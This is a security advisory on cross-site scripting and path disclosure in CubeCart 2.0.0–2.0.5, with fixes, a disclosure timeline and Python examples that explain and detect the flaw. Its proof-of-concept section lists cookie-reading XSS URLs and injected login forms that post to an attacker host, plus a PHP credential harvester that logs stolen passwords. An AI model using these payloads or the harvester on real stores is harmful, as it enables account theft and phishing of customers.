########################################################
CubeCart 2.0.x multiple variable XSS and path disclosure
vendor: Devellion Limited
vendor url: http://www.cubecart.com
vendor confirmed: yes
exploit available: yes
advisory: http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html
vendor solution: http://www.cubecart.com/site/forums/index.php?showtopic=6032
Related OSVDB IDs: 14062, 13810 (more related entries on OSVDB)
Secunia: SA14416
Securitytracker: 1013304
#########################################################
CubeCart contains a flaw that allows remote cross-site scripting attacks. The flaw exists because the application does not validate several request variables before they are used by a number of scripts. A remote attacker can craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity (the PoCs below simply display document.cookie; a real attack would send it, or a phished password, to the attacker).
The script 'admin/Settings.inc.php' is included by all of the affected files, and it is this script that fails to validate the values that reach the other files through the variables listed below.
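To make the bug class concrete, here is an added example (written for this page, not CubeCart's own code, and in Python rather than the store's PHP) that imitates the pre-2.0.6 pattern: a request variable is echoed straight into a double-quoted HTML attribute, so the advisory's `1"><script>...` payload closes the attribute and the tag and injects a live script element. It shows the two fixes beside it: encoding on output for the attribute context (the equivalent of PHP's `htmlspecialchars($v, ENT_QUOTES)`) and, for numeric ids such as cat_id, rejecting anything that is not an integer on input. The `<input type="hidden" name="cat_id">` markup is an assumed stand-in for where the value is reflected.

```python
import html
import re

# The advisory's first payload: a double quote and > close the attribute and
# the tag the value lands in, then a script element follows.
PAYLOAD = '1"><script>alert(document.cookie);</script>'


def render_vulnerable(cat_id):
    """Constructed imitation of the 2.0.0-2.0.5 pattern: the request variable
    is echoed into a double-quoted attribute with no validation or encoding.
    This is an illustration of the bug class, NOT CubeCart's own code."""
    return '<input type="hidden" name="cat_id" value="%s">' % cat_id


def render_encoded(cat_id):
    """Same output position, but HTML-encoded for an attribute context
    (what PHP htmlspecialchars($v, ENT_QUOTES) does): " < > & become
    entities, so the attribute cannot be closed early and no tag is created."""
    return '<input type="hidden" name="cat_id" value="%s">' % html.escape(
        str(cat_id), quote=True)


def render_validated(cat_id):
    """Stricter alternative for numeric ids: accept only a string of ASCII
    digits before the value is used anywhere. Returns None on rejection."""
    if not isinstance(cat_id, str) or not re.fullmatch(r"[0-9]+", cat_id):
        return None
    return '<input type="hidden" name="cat_id" value="%d">' % int(cat_id)


def has_live_script(markup):
    """Rough oracle for the demo: a literal <script start tag in the output
    means the injected text will be parsed as an element, not shown as text."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable),
                     ("encoded", render_encoded),
                     ("validated", render_validated)):
        out = fn(PAYLOAD)
        print("%-10s live script: %-5s %s" % (
            name, has_live_script(out or ""), out))
```

The encoded form is the general fix for any variable that must be reflected (catname, search, page); the validating form is the better one for ids that can only ever be integers, because it also closes off injection into SQL or include paths that the same variable may reach.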
##################
variables affected:
##################
cat_id
PHPSESSID
view_doc
product
session
catname
search
page
###########################
possible files affected by XSS:
###########################
forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php
##############################
path disclosure files affected:
##############################
information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php
PoC (request one of these include files directly) = http://[Target]/path_to_store/cat_navi.php
###################
versions affected:
###################
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6 is not affected.
#####################################################
Some proofs of concept (there are many more):
#####################################################
http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p></body>
http://[Target]/path_to_store/view_order.php?session=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/view_product.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
http://[Target]/path_to_store/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/login.php?session="><script>alert(document.cookie);</script>
http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form>
http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E
###########################
proof of concept savedb.php (the form target used by the two phishing payloads above)
###########################
<?php
// Credential harvester reached by the injected <form action=...> above.
// The original relied on register_globals to populate $username/$password;
// read them from $_POST so it also works with register_globals off.
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';

// Append the stolen pair to a local file ...
$lala = fopen("tostada.txt", "a+");
fwrite($lala, "username:" . $username . "|" . "Password:" . $password . "|\n");
fclose($lala);

// ... and bounce the victim to the real login page so nothing looks wrong.
header("Location: http://[target]/path_to_store/login.php");
exit();
?>
#############################
Change the variable for another vulnerable one, or change both file and variable:
so many of them are vulnerable :P
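Walking that file x variable matrix by hand is tedious, so here is an added Python example (not from the advisory) that builds one request per (file, variable) pair from the lists above, using an inert marker instead of alert() that still carries the `"` and `>` the payloads rely on, and classifies a response as reflecting the marker raw (vulnerable), entity-encoded (htmlspecialchars-style fix) or not at all. It also builds the direct requests for the path-disclosure files and pulls absolute server paths out of PHP warnings in the body. The base URL `http://shop.example/store/` and the sample responses are constructed for the demonstration; no network requests are made.

```python
import html
import re
from urllib.parse import urlencode

# Files and request variables named in the advisory (CubeCart 2.0.0 - 2.0.5).
XSS_FILES = ["forgot_pass.php", "index.php", "login.php", "logout.php",
             "new_pass.php", "register.php", "sale_cat.php", "search.php",
             "tellafriend.php", "view_doc.php", "view_order.php",
             "view_product.php", "your_links.php", "your_orders.php"]
XSS_VARS = ["cat_id", "PHPSESSID", "view_doc", "product", "session",
            "catname", "search", "page"]
PATH_DISCLOSURE_FILES = ["information.php", "language.php", "list_docs.php",
                         "popular_prod.php", "sale.php", "subfooter.inc.php",
                         "subheader.inc.php", "cat_navi.php"]

# Inert marker: easy to grep for, and it carries the two characters (" and >)
# that the advisory's payloads use to break out of an attribute.
MARKER = 'xsschk1"><xsschk2>'


def build_xss_urls(base_url, files=XSS_FILES, variables=XSS_VARS, payload=MARKER):
    """One request per (file, variable) pair, percent-encoded as a browser
    would send it. base_url is the store root (http://[Target]/path_to_store/)."""
    root = base_url.rstrip("/")
    return ["%s/%s?%s" % (root, f, urlencode({v: payload}))
            for f in files for v in variables]


def build_path_disclosure_urls(base_url, files=PATH_DISCLOSURE_FILES):
    """Direct requests to include files that were never meant to be called alone."""
    root = base_url.rstrip("/")
    return ["%s/%s" % (root, f) for f in files]


def classify_reflection(body, marker=MARKER):
    """'raw'     - marker appears verbatim: attribute break-out works (vulnerable)
       'encoded' - only the entity-encoded form appears (htmlspecialchars-style fix)
       'absent'  - the variable is not reflected into this page at all"""
    if marker in body:
        return "raw"
    if html.escape(marker, quote=True) in body:
        return "encoded"
    return "absent"


# PHP's default error line, with or without the <b> tags of html_errors=On:
#   Warning: ... in /abs/path/file.php on line N
_PHP_ERROR = re.compile(
    r"(?:Warning|Notice|Fatal error)(?:</b>)?:.*? in (?:<b>)?(/[^\s<]+\.php)(?:</b>)? on line",
    re.S)


def find_disclosed_paths(body):
    """Absolute server paths leaked through PHP warnings/notices in a response."""
    return sorted(set(_PHP_ERROR.findall(body)))


def triage(responses):
    """responses: {url: body}. Returns (urls reflecting the marker raw,
    {url: [leaked paths]})."""
    raw = [u for u, b in responses.items() if classify_reflection(b) == "raw"]
    leaks = {}
    for u, b in responses.items():
        paths = find_disclosed_paths(b)
        if paths:
            leaks[u] = paths
    return raw, leaks


# Constructed sample responses (not real CubeCart output) for an offline run.
BASE = "http://shop.example/store/"   # placeholder for http://[Target]/path_to_store/
SAMPLE_RESPONSES = {
    build_xss_urls(BASE, ["view_order.php"], ["cat_id"])[0]:
        '<form><input type="hidden" name="cat_id" value="' + MARKER + '"></form>',
    build_xss_urls(BASE, ["search.php"], ["search"])[0]:
        '<input type="text" name="search" value="' + html.escape(MARKER, quote=True) + '">',
    build_xss_urls(BASE, ["logout.php"], ["page"])[0]:
        "<html><body>You have been logged out.</body></html>",
    build_path_disclosure_urls(BASE, ["cat_navi.php"])[0]:
        "<br />\n<b>Warning</b>:  Undefined variable: db in "
        "<b>/home/store/public_html/cat_navi.php</b> on line <b>12</b><br />",
}

if __name__ == "__main__":
    print("%d XSS requests, %d path-disclosure requests" % (
        len(build_xss_urls(BASE)), len(build_path_disclosure_urls(BASE))))
    raw, leaks = triage(SAMPLE_RESPONSES)
    for u in raw:
        print("RAW REFLECTION ", u)
    for u, paths in leaks.items():
        print("PATH DISCLOSURE", u, paths)
```

To use it against a real store, fetch each URL from `build_xss_urls` and `build_path_disclosure_urls` with the session cookie of a logged-in test user (several of the affected pages, such as view_order.php and your_orders.php, require one) and feed the bodies to `triage`. A `raw` hit is the vulnerable case; an `encoded` hit after upgrading to 2.0.6 or applying the vendor fix is what the fix should look like.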
solution:
1- Upgrade to version 2.0.6.
1.1- For the path disclosure issue the vendor released a fix on 2005-02-21. CubeCart 2.0.6 is not affected; upgrade your store or apply the fix.
1.2- For most of the XSS flaws you need to update your store to 2.0.6 and wait for all changes, or apply the fix manually.
#################
release timeline:
#################
discovered: 2005-02-15
vendor notified: 2005-02-15
vendor response: 2005-02-15
path disclosure fix: 2005-02-21
XSS fix: 2005-02-25
disclosure date: 2005-02-25
Sincerely,
Lostmon (lostmon@gmail.com)
Thanks to estrella for being my light
Thanks to www.hispanew.com for support
Thanks to the CubeCart team: good response and good work!
Thanks to http://www.osvdb.org
blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving...